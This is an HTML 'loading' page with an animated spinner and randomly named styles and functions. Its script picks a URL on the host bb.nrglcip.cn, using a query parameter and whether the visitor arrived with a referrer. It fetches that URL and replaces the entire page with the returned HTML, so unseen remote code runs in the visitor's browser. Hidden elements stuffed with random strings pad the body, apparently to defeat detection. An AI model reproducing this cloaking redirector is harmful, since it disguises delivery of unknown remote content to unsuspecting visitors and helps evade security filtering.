<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .diQ08awUFf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .diQ08awUFf .Kv7q8aQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .diQ08awUFf .content {
            line-height: 50px;
            text-align: center
        }

        .diQ08awUFf .img {
            width: 100%
        }

        .diQ08awUFf .ZWqwrPx {
            text-align: center
        }

        .diQ08awUFf .ZWqwrPx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .diQ08awUFf .ZWqwrPx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .diQ08awUFf .ZWqwrPx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .diQ08awUFf .ZWqwrPx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .diQ08awUFf .ZWqwrPx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .diQ08awUFf .ZWqwrPx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .diQ08awUFf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function T2XlYJ6r9CUla(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ydIBBWi = T2XlYJ6r9CUla('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ydIBBWi +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ydIBBWi +".html?a=share";
		}
		
        zmJgiH=url+"#"+new Date().getTime();
        zmJgiH && function() {
            $.get(zmJgiH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>TIDM7HkFUvKdihE5XWUSj0HAP1eLK0jHRBuVtqwd8hZ0wbj</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>fgctRoAogs39e9JSg</a>
<img  src='' style='display:none'>
<ul style='display:none' >bA76RQFyS9Y7xLbWjar8kTdr4ZY2RzYr0PqpLATbSe68NHch</ul>
<p  style='display:none'>QU1mPKse0GbEMt5ZLAv0bM4GLFXwKCXirVTQ2k2vxum3D8peBnX6TEwDXJQbhpZHQlXj9XgK</p>
<span style='display:none'>TIDM7HkFUvKdihE5XWUSj0HAP1eLK0jHRBuVtqwd8hZ0wbj</span>
<img  src='' style='display:none'>
<li style='display:none' >twcU7IsuyOMSii8Ksasssaw0dB4BiFst0pXmjw</li>
<a  href='#' style='display:none'>fgctRoAogs39e9JSg</a><div class="diQ08awUFf">
    <div class="Kv7q8aQ">
        <div class="ZWqwrPx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>PkKqZbneajvn05JxRM7l5nFtnSJM4SbBw7jFstrR3ukkgVRd5XXo6DSAnnvQlDArgILvTq2iD2FOsAnJZhJ2RISri</a>
<img  src='' style='display:none'>
<b style='display:none' >YJ0pR0cnbqsdwOi3MDo0pmSEgquVIbBcwm4vO1wmbKzer3VZLC8JIw</b>
<b style='display:none' >YJ0pR0cnbqsdwOi3MDo0pmSEgquVIbBcwm4vO1wmbKzer3VZLC8JIw</b>
<img  src='' style='display:none'></body>
</html>